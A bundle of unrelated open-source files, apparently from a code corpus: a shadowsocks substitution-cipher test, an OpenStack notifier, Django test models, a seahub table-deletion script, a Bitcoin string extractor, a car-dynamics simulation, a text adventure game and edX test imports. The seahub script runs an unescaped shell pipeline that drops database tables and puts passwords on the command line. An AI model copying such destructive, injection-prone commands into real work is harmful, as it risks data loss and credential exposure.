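# deterministic permutation of all 256 byte values from md5(key), so e.g.
#     table = b''.join(get_table(b'example-key'))
#     assert len(table) == 256 and len(set(table)) == 256
# holds, and TableCipher below is a plain byte-substitution cipher keyed by
# that hash.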
def init_table(key):
if key not in cached_tables:
encrypt_table = b''.join(get_table(key))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
cached_tables[key] = [encrypt_table, decrypt_table]
return cached_tables[key]
class TableCipher(object):
def __init__(self, cipher_name, key, iv, op):
self._encrypt_table, self._decrypt_table = init_table(key)
self._op = op
def update(self, data):
if self._op:
return translate(data, self._encrypt_table)
else:
return translate(data, self._decrypt_table)
ciphers = {
'table': (0, 0, TableCipher)
}
def test_table_result():
from shadowsocks.common import ord
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181,
255, 143, 83, 247, 162, 16, 31, 209, 190, 171, 115, 65, 38, 41, 21,
245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216,
173, 29, 241, 119, 64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204,
56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11, 254,
213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178,
10, 198, 71, 77, 36, 113, 167, 48, 2, 117, 140, 142, 66, 199, 232,
243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253,
130, 8, 184, 14, 152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96,
163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235, 127,
0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79,
74, 210, 30, 73, 201, 151, 208, 114, 101, 174, 92, 52, 120, 240, 15,
169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9,
191, 45, 6, 25, 4, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97,
202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102, 118, 135,
148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164,
237, 111, 125, 207, 160, 187, 246, 234, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124,
180, 21, 191, 138, 83, 217, 30, 86, 7, 70, 200, 56, 62, 218, 47, 168,
22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33,
230, 98, 43, 148, 110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35,
215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130, 94,
164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176,
220, 5, 153, 135, 213, 154, 189, 238, 174, 226, 53, 222, 146, 162,
236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34,
234, 108, 207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228,
155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229, 66, 116,
171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14,
36, 97, 163, 181, 72, 25, 144, 46, 175, 89, 145, 113, 90, 159, 190,
15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69,
117, 57, 92, 104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167,
160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240, 185, 241,
79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179,
48, 9, 106, 216, 31, 249, 19, 85, 254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32,
209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99, 80, 208, 112, 36,
248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41,
10, 180, 194, 50, 204, 243, 246, 251, 29, 198, 219, 210, 195, 21, 54,
91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116,
148, 78, 46, 1, 137, 150, 110, 181, 56, 95, 139, 58, 3, 231, 66, 165,
142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20,
214, 185, 83, 160, 253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144,
18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152, 240,
155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40,
254, 12, 67, 93, 217, 6, 94, 16, 19, 82, 86, 245, 24, 197, 134, 132,
138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135,
156, 25, 61, 75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120,
171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213, 236, 126,
52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97,
129, 161, 177, 87, 237, 141, 173, 191, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39,
174, 67, 137, 175, 121, 59, 9, 128, 179, 199, 132, 4, 140, 54, 1, 85,
14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93,
190, 220, 69, 49, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19,
82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201, 11, 72,
92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129,
170, 173, 100, 84, 242, 157, 26, 218, 20, 33, 191, 155, 232, 87, 86,
153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75,
210, 0, 81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183,
101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223, 96, 141, 150, 131,
13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38,
77, 2, 213, 207, 249, 147, 113, 135, 245, 118, 193, 47, 98, 145, 66,
160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55,
231, 79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225,
122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6, 230, 133, 215, 41,
184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108,
51, 83, 178, 52, 3, 31, 255, 195, 53, 235, 126, 167, 120]]
encrypt_table = b''.join(get_table(b'foobar!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target1[0][i] == ord(encrypt_table[i]))
assert (target1[1][i] == ord(decrypt_table[i]))
encrypt_table = b''.join(get_table(b'barfoo!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target2[0][i] == ord(encrypt_table[i]))
assert (target2[1][i] == ord(decrypt_table[i]))
def test_encryption():
from shadowsocks.crypto import util
cipher = TableCipher('table', b'test', b'', 1)
decipher = TableCipher('table', b'test', b'', 0)
util.run_cipher(cipher, decipher)
if __name__ == '__main__':
test_table_result()
test_encryption()
|
apache-2.0
|
oeeagle/quantum
|
neutron/openstack/common/notifier/api.py
|
22
|
5734
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo.config import cfg
from neutron.openstack.common import context
from neutron.openstack.common.gettextutils import _
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import timeutils
LOG = logging.getLogger(__name__)
notifier_opts = [
cfg.MultiStrOpt('notification_driver',
default=[],
help='Driver or drivers to handle sending notifications'),
cfg.StrOpt('default_notification_level',
default='INFO',
help='Default notification level for outgoing notifications'),
cfg.StrOpt('default_publisher_id',
default='$host',
help='Default publisher_id for outgoing notifications'),
]
CONF = cfg.CONF
CONF.register_opts(notifier_opts)
WARN = 'WARN'
INFO = 'INFO'
ERROR = 'ERROR'
CRITICAL = 'CRITICAL'
DEBUG = 'DEBUG'
log_levels = (DEBUG, WARN, INFO, ERROR, CRITICAL)
class BadPriorityException(Exception):
pass
def notify_decorator(name, fn):
"""Decorator for notify which is used from utils.monkey_patch().
:param name: name of the function
:param fn: the function object being wrapped
:returns: function -- decorated function
"""
def wrapped_func(*args, **kwarg):
body = {}
body['args'] = []
body['kwarg'] = {}
for arg in args:
body['args'].append(arg)
for key in kwarg:
body['kwarg'][key] = kwarg[key]
ctxt = context.get_context_from_function_and_args(fn, args, kwarg)
notify(ctxt,
CONF.default_publisher_id,
name,
CONF.default_notification_level,
body)
return fn(*args, **kwarg)
return wrapped_func
def publisher_id(service, host=None):
if not host:
host = CONF.host
return "%s.%s" % (service, host)
def notify(context, publisher_id, event_type, priority, payload):
"""Sends a notification using the specified driver
:param publisher_id: the source worker_type.host of the message
:param event_type: the literal type of event (ex. Instance Creation)
:param priority: patterned after the enumeration of Python logging
levels in the set (DEBUG, WARN, INFO, ERROR, CRITICAL)
:param payload: A python dictionary of attributes
Outgoing message format includes the above parameters, and appends the
following:
message_id
a UUID representing the id for this notification
timestamp
the GMT timestamp the notification was sent at
The composite message will be constructed as a dictionary of the above
attributes, which will then be sent via the transport mechanism defined
by the driver.
Message example::
{'message_id': str(uuid.uuid4()),
'publisher_id': 'compute.host1',
'timestamp': timeutils.utcnow(),
'priority': 'WARN',
'event_type': 'compute.create_instance',
'payload': {'instance_id': 12, ... }}
"""
if priority not in log_levels:
raise BadPriorityException(
_('%s not in valid priorities') % priority)
# Ensure everything is JSON serializable.
payload = jsonutils.to_primitive(payload, convert_instances=True)
msg = dict(message_id=str(uuid.uuid4()),
publisher_id=publisher_id,
event_type=event_type,
priority=priority,
payload=payload,
timestamp=str(timeutils.utcnow()))
for driver in _get_drivers():
try:
driver.notify(context, msg)
except Exception as e:
LOG.exception(_("Problem '%(e)s' attempting to "
"send to notification system. "
"Payload=%(payload)s")
% dict(e=e, payload=payload))
_drivers = None
def _get_drivers():
"""Instantiate, cache, and return drivers based on the CONF."""
global _drivers
if _drivers is None:
_drivers = {}
for notification_driver in CONF.notification_driver:
add_driver(notification_driver)
return _drivers.values()
def add_driver(notification_driver):
"""Add a notification driver at runtime."""
# Make sure the driver list is initialized.
_get_drivers()
if isinstance(notification_driver, basestring):
# Load and add
try:
driver = importutils.import_module(notification_driver)
_drivers[notification_driver] = driver
except ImportError:
LOG.exception(_("Failed to load notifier %s. "
"These notifications will not be sent.") %
notification_driver)
else:
# Driver is already loaded; just add the object.
_drivers[notification_driver] = notification_driver
def _reset_drivers():
"""Used by unit tests to reset the drivers."""
global _drivers
_drivers = None
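# Illustrative usage sketch (not part of the original module; the driver path
# below is an assumption -- any importable module exposing notify(context, msg)
# can be registered the same way):
#
#     add_driver('neutron.openstack.common.notifier.log_notifier')
#     notify(context=None,
#            publisher_id=publisher_id('network'),
#            event_type='port.create.end',
#            priority=INFO,
#            payload={'port_id': 'example-port'})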
|
apache-2.0
|
cobalys/django
|
tests/modeltests/files/models.py
|
141
|
1038
|
"""
42. Storing files according to a custom storage system
``FileField`` and its variations can take a ``storage`` argument to specify how
and where files should be stored.
"""
import random
import tempfile
from django.db import models
from django.core.files.storage import FileSystemStorage
temp_storage_location = tempfile.mkdtemp()
temp_storage = FileSystemStorage(location=temp_storage_location)
class Storage(models.Model):
def custom_upload_to(self, filename):
return 'foo'
def random_upload_to(self, filename):
# This returns a different result each time,
# to make sure it only gets called once.
return '%s/%s' % (random.randint(100, 999), filename)
normal = models.FileField(storage=temp_storage, upload_to='tests')
custom = models.FileField(storage=temp_storage, upload_to=custom_upload_to)
random = models.FileField(storage=temp_storage, upload_to=random_upload_to)
default = models.FileField(storage=temp_storage, upload_to='tests', default='tests/default.txt')
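# Illustrative sketch (not part of the original test models): saving content
# through one of these fields routes the file into ``temp_storage`` under the
# field's ``upload_to`` value, e.g.
#
#     from django.core.files.base import ContentFile
#     obj = Storage()
#     obj.normal.save("django_test.txt", ContentFile("content"))
#     # stored at '<temp_storage_location>/tests/django_test.txt'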
|
bsd-3-clause
|
cloudcopy/seahub
|
tools/batch-delete.py
|
6
|
1819
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import MySQLdb
import settings
try:
dbname = os.environ['DBNAME']
dbuser = os.environ['DBUSER']
dbpasswd = os.environ['DBPASSWD']
except:
sys.stderr.write('Environment not set! Exit\n')
sys.exit(1)
def check_settings():
if settings.DATABASE_ENGINE == 'mysql':
sys.stderr.write('[ERROR] Current settings is mysql, need sqlite settings\n')
sys.exit(1)
def do_create():
root_passwd = raw_input("Please enter root password to create database %s: " % dbname)
conn = MySQLdb.Connect(host='localhost', user='root', passwd=root_passwd)
cursor = conn.cursor()
create_cmd = ( "CREATE DATABASE IF NOT EXISTS `%s` default charset utf8 COLLATE utf8_general_ci;") % (dbname)
grant_cmd = ("grant all privileges on %s.* to '%s'@localhost identified by '%s';") % (dbname, dbuser, dbpasswd)
try:
cursor.execute(create_cmd)
cursor.execute(grant_cmd)
except:
pass
cursor.close()
conn.close()
def do_delete(prefix):
cmd = ('echo "select concat(\'drop table \', table_name ,\';\') from TABLES where TABLE_SCHEMA =\'%s\' and table_name like \'%s_%%\' ;" | mysql -u %s -p%s information_schema | sed -n \'2,$p\' | mysql -u %s -p%s %s') % (dbname, prefix, dbuser, dbpasswd, dbuser, dbpasswd, dbname)
try:
output = os.popen(cmd).read()
except:
pass
if __name__=="__main__":
# check current settings.py
check_settings()
# create database if not exists
do_create()
# delete all seahub tables
for app in settings.INSTALLED_APPS:
app_name = app.split('.')[-1]
do_delete(app_name)
do_delete('django')
print '[Delete seahub tables...Done]'
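# Illustrative invocation (not part of the original script); the values are
# placeholders for the required environment variables read above:
#
#     DBNAME=seahub DBUSER=seahub DBPASSWD=secret python batch-delete.py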
|
apache-2.0
|
Bushstar/UFO-Project
|
share/qt/extract_strings_qt.py
|
24
|
2667
|
#!/usr/bin/env python3
# Copyright (c) 2012-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Extract _("...") strings for translation and convert to Qt stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import operator
import os
import sys
OUT_CPP="qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
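# Illustrative example (not part of the original script) of the 'po' fragments
# this parser consumes:
#
#     msgid "Error loading block database."
#     msgstr ""
#
# parse_po() would return [(['"Error loading block database."'], ['""'])],
# keeping the raw quoted lines so they can be re-emitted verbatim below.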
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
if not XGETTEXT:
print('Cannot extract strings: xgettext utility is not installed or not configured.',file=sys.stderr)
print('Please install package "gettext" and re-run \'./configure\'.',file=sys.stderr)
sys.exit(1)
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out.decode('utf-8'))
f = open(OUT_CPP, 'w', encoding="utf8")
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings_qt.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('PACKAGE_NAME'),))
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS'),))
if os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION') != os.getenv('PACKAGE_NAME'):
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION'),))
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
mit
|
Shekharrajak/mubosym
|
exa_8_simple_car_sequencer.py
|
2
|
6197
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 20:41:09 2015
@author: oliver
"""
import numpy as np
from sympy import symbols, sin
import mubosym as mbs
from interp1d_interface import interp
###############################################################
# general system setup example
myMBS = mbs.MBSworld('simple_car_sequ', connect=True, force_db_setup=False)
axes_rear_marker = ['body_car_rr', 'body_car_rl' ]
axes_front_marker = ['body_car_fr', 'body_car_fl' ]
I_car = [500.,3000.,1500.]
I_0 = [0.,0.,0.]
I_tire = [1.,1.,1.]
k = interp(filename = mbs.DATA_PATH+"/vel_01.dat")
#high end definition of static variables...
@mbs.static_vars(t_p=0, diff_p=0)
def lateral_inp(t):
#return -20.
velocity = myMBS.get_control_signal(0)
v_soll = k.f_interp(t)
diff = (v_soll-velocity)/10.0
delt = (t-lateral_inp.t_p)
diff = (lateral_inp.diff_p *0.5 + diff* delt) / (delt + 0.5)
lateral_inp.diff_p = diff
lateral_inp.t_p = t
return -2000*diff
def zero(t):
return 0.
myMBS.add_parameter('theta_lateral', lateral_inp, zero, zero)
def axes_front(axes_marker, n):
myMBS.add_body_3d('carrier_f'+str(n), axes_marker, 60.0, I_0, 'y-axes', parameters = [])
myMBS.add_force_special('carrier_f'+str(n), 'spring-damper-axes', parameters = [20000., -1.0, 800.])
myMBS.add_force_special('carrier_f'+str(n), 'grav')
myMBS.add_rotating_marker_para('carrier_M_f'+str(n), 'carrier_f'+str(n), 'phi', 0.,-0.20,0.0, 'Y')
myMBS.add_body_3d('tire_f'+str(n), 'carrier_M_f'+str(n), 1.0, I_tire , 'revolute-Z', parameters = [])
myMBS.add_one_body_force_model('tiremodel_'+str(n), 'tire_f'+str(n),'carrier_M_f'+str(n),'tire')
def axes_rear(axes_marker, n):
myMBS.add_body_3d('carrier_r'+str(n), axes_marker, 60.0, I_0, 'y-axes', parameters = [])
myMBS.add_force_special('carrier_r'+str(n), 'spring-damper-axes', parameters = [20000., -1.0, 800.])
myMBS.add_force_special('carrier_r'+str(n), 'grav')
myMBS.add_marker('carrier_M_r'+str(n), 'carrier_r'+str(n) , 0.,-0.20,0.0)
myMBS.add_body_3d('tire_r'+str(n), 'carrier_M_r'+str(n), 1.0, I_tire , 'revolute-Z', parameters = [])
myMBS.add_one_body_force_model('tiremodel_'+str(n), 'tire_r'+str(n),'carrier_M_r'+str(n),'tire')
# a simple car using sequence buildup
myMBS.add_body_3d('body_car', 'world_M0', 2000.0, I_car, 'free-6', parameters = [], graphics = False) #[np.pi/2., 2.0])
myMBS.add_marker('body_car_fr', 'body_car', 1.5,0.,0.7)
myMBS.add_marker('body_car_fl', 'body_car', 1.5,0.,-0.7)
myMBS.add_marker('body_car_rr', 'body_car', -1.5,0.,0.7)
myMBS.add_marker('body_car_rl', 'body_car', -1.5,0.,-0.7)
myMBS.add_force_special('body_car', 'grav')
###############################################
##steering expression:
#def rotation_inp_expr():
# t, A = symbols('t A')
# return A*sin(1.0*t)
#A = symbols('A')
#def rotation_inp_expr():
# t, A = symbols('t A')
# return (A+0.02*t)*sin(1.0*t)
A = -0.02
omega = 0.8
def rotation_inp(t):
if t < 10.:
return 0.
else:
return A*np.sin(omega*(t-10.))
def rotation_inp_diff(t):
if t < 10.:
return 0.
else:
return A*omega*np.cos(omega*(t-10.))
def rotation_inp_diff_2(t):
if t < 10.:
return 0.
else:
return -A*omega*omega*np.sin(omega*(t-10.))
#myMBS.add_parameter_expr('phi', rotation_inp_expr(), {A: 0.0})
myMBS.add_parameter('phi', rotation_inp, rotation_inp_diff, rotation_inp_diff_2)
n = 0
for name in axes_rear_marker:
axes_rear(name, n)
n+=1
n = 0
for name in axes_front_marker:
axes_front(name, n)
n+=1
myMBS.add_parameter_torque('tire_r0', 'carrier_M_r0', [0.,0.,1.], 'theta_lateral')
myMBS.add_parameter_torque('tire_r1', 'carrier_M_r1', [0.,0.,1.], 'theta_lateral')
#################################################
# constants
g = symbols('g')
constants = [ g ] # Constant definitions
constants_vals = [9.81] # Numerical value
const_dict = dict(zip(constants, constants_vals))
myMBS.set_const_dict(const_dict)
##################################
# create control signals:
vel_1 = myMBS.get_body('body_car').get_vel_magnitude()
myMBS.add_control_signal(vel_1)
##################################
#to settle car ...
for b in myMBS.bodies.keys():
myMBS.add_damping(b, 10.0)
body = myMBS.get_body('body_car')
body.set_small_angles([body.get_phi(), body.get_psi()])
myMBS.kaneify(simplify=False)
moving_frames_in_graphics = ['tire_f0', 'carrier_M_f0', 'body_car']
fixed_frames_in_graphics = []
forces_in_graphics = ['body_car']
bodies_in_graphics = {'tire_f0': 'tire','tire_f1': 'tire','tire_r0': 'tire','tire_r1': 'tire', 'body_car':'box'}
myMBS.prep_lambdas(moving_frames_in_graphics, fixed_frames_in_graphics, forces_in_graphics, bodies_in_graphics)
############################################################
# now setup all maneuvers
#myMBS.exchange_parameter_expr('phi', rotation_inp_expr(), {A: 0.05})
dt = 0.01 # 10 ms for a nice animation result
t_max = 35.
#first starting conditions ... (thrown on the street)
#x0 = np.hstack(( 0. * np.ones(myMBS.dof), 1. * np.zeros(myMBS.dof)))
x0 = np.array([ -6.98702128e-08, 5.85260703e-06, -3.62073872e-07,
1.12804336e-04, 9.27282033e-01, 9.40668424e-08,
-7.54750554e-01, -3.32459591e-04, -7.54750481e-01,
-3.31175253e-04, -7.54749593e-01, -3.33075785e-04,
-7.54749524e-01, -3.31802373e-04, -2.89428308e-07,
-6.98425700e-08, -2.59191657e-06, 5.04886037e-06,
2.39749721e-07, -2.31595563e-07, -3.82747611e-06,
-5.06125891e-06, -3.57698842e-06, -5.35752999e-06,
3.04894626e-06, -5.07140660e-06, 3.26773587e-06,
-5.36760469e-06])
myMBS.inte_grate_full(x0, t_max, dt, mode = 0, tolerance = 1e+0)
x_final = myMBS.x_t[-1]
################################################
# linear analysis of the last state (returns also the jacobian)
jac = myMBS.calc_lin_analysis_n(len(myMBS.x_t)-1)
inp = raw_input("Continue to animation (press return)...")
myMBS.prepare(mbs.DATA_PATH, save=False)
#myMBS.plotting(t_max, dt, plots='tire')
a = myMBS.animate(t_max, dt, scale = 4, time_scale = 1, t_ani = 35., labels = True, center = 0)
|
mit
|
Paul-Haley/LPTHW_python3
|
ex43.py
|
1
|
9174
|
from sys import exit
from random import randint
class Scene(object):
def enter(self):
print("This scene is not yet configured. Subclass it and implement "\
"enter().")
exit(1) # error numbers beyond 0 typically indicate an error
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene('finished')
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
quips = [
"You died. You kinda suck at this.",
"Your mom would be proud...if she were smarter.",
"Such a luser.", # (sic)
"I have a small puppy that's better at this."
]
def enter(self):
print(Death.quips[randint(0, len(self.quips) - 1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print("The Gothons of Planet Percal #25 have invaded your ship and destroyed")
print("your entire crew. You are the last surviving member and your last")
print("mission is to get the neutron destruct bomb from the Weapons Armory,")
print("put it on the bridge, and blow the hsip up after getting into an ")
print("escape pod.\n\n") # Little lazy here
print("Your're running down the central corridor to the Weapons Armory when")
print("a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume")
print("flowing around his hate filled body. He's blocking the door to the")
print("Armory and about to pull a weapon to blast you.")
action = input("> ")
if action == "shoot!":
print("Quick on the draw you yank out your blaster and fire it at the Gothon.")
print("His clown costume is flowing and moving around his body, which throws")
print("off your aim. Your laser hits his custume but misses him entirely. This")
print("makes him fly into an insane rage an dblast you repeatedly in the face until you are dead. Then he eats you.")
return 'death'
elif action == "dodge!":
print("Like a world class boxer you dodge, weave, slip and slide right")
print("as the Gothon's blaster cranks a laser past your head.")
print("In the middle of your artful dodge your foot slips and you")
print("bang your head on the metal wall and pass out.")
print("You wake up shortly after only to die as the Githon stomps on")
print("your head and eats you.")
return 'death'
elif action == "tell a joke":
print("Lucky for you they made you learn Gothon insults in the academy.")
print("You tell the one Gothon joke you know:")
print("lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebnaq gur ubhfq.")
print("The Gothon stops, tries not to laugh, then busts out laughing and can't move.")
print("While he's laughing you run up and shoot him square in the head")
print("putting him down, you jump through the Weapon Armory door.")
return 'laser_weapon_armory'
else:
print("DOES NOT COMPUTE!")
return 'central_corridor'
class LaserWeaponArmory(Scene):
def enter(self):
print("You do a dive roll into the Weapon Armory, crouch and scan the room")
print("for more Gothons that might be hiding. It's dead quiet, too quiet.")
print("You stand up and run to the far side of the room and find the")
print("neutron bomb in its container. There's a keypad lock on the box")
print("and you need the code to get the bomb out. If you get the code")
print("wrong 10 times then the lock closes forever and you can't")
print("get the bomb. The code is 3 digits.")
# The probability of solving this is low, fixing numbers helps
code = "%d%d%d" % (randint(1,9), randint(1,9), randint(1,9))
guess = input("[keypad]> ")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD!")
guesses += 1
guess = input("[keypad]> ") # we could have done a prompt variable
if guess == code:
print("The container clicks open and the seal breaks, letting gas out.")
print("You grab the neutron bomb and run as fast as you can to the")
print("bridge where you must place it in the right spot.")
return 'the_bridge'
else:
print("The lock buzzes one last time and then you hear a sickening")
print("melting sound as the mechanism is fused together.")
print("You decide to sit there, and finally the Gothons blow up the")
print("ship from their ship and you die.")
return 'death'
class TheBridge(Scene):
def enter(self):
print("You burst onto the Bridge with the netron destruct bomb")
print("under your arm and the surprise 5 Gothons who are trying to")
print("take control of the ship. Each of them has an even uglier")
print("clown custume than the last. They haven't pulled their")
print("weapons out yet, as they see the active bomb under your")
print("arm and don't want to set it off.")
action = input("> ") # could have used a global prompt variable
if action == "throw the bomb":
print("In a panic you throw the bomb at the group of Gothons")
print("and make a leap for the door. Right as you drop it a")
print("Gothon shoots you right in the back killing you.")
print("As you die you see another Gothon frantically try to disarm")
print("the bomb. You die knowing they will probably blow up when")
print("it goes off.")
return 'death'
elif action == "slowly place the bomb":
print("You point your blaster at the bomb under your arm")
print("and the Gothons put their hand up and start to sweat.")
print("You inch backward to the door, open it, and then carefully")
print("place the bomb on the floor, pointing your blaster at it.")
print("You then jump back through the door, punch the close button")
print("and blast the lock so the Gothons can't get out.")
print("Now that the bomb is placed you run to the escape pod to")
print("get off this tin can.")
return 'escape_pod'
else:
print("DOES NOT COMPUTE!") # Could be a variable or function
return "the_bridge"
class EscapePod(Scene):
def enter(self):
print("You rush through the ship desperately trying to make it to")
print("the escape pod before the whole ship explodes. It seems like")
print("hardly any Gothons are on the ship, so your run is clear of")
print("interference. You get to the chamber with the escape pods, and")
print("now need to pick one to take. Some of them could be damaged")
print("but you don't have time to look. There's 5 pods, which one")
print("do you take?")
good_pod = randint(1, 5)
guess = input("[pod #]> ")
if int(guess) != good_pod:
print("You jump into pod %s and hit the eject button." % guess)
print("The pod escapes out into th evoid of space, then")
print("implodes as the hull ruptures, crushing your body")
print("into jam jelly.")
return 'death'
else: # Note this first line is common and could be before the if
print("You jump into pod %s and hit the ejct button." % guess)
print("The pod easily slides out into space heading to")
print("the planet below. As it flies to the planet, you look")
print("back and see your ship implode then explode like a")
print("bright star, taking out the Gothon ship at the same")
print("time. You won!")
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job.")
return 'finished'
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished()
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
val = Map.scenes.get(scene_name)
return val #This could be combined in one line
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
|
mit
|
nicky-ji/edx-nicky
|
lms/djangoapps/instructor_task/tests/test_views.py
|
204
|
17817
|
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
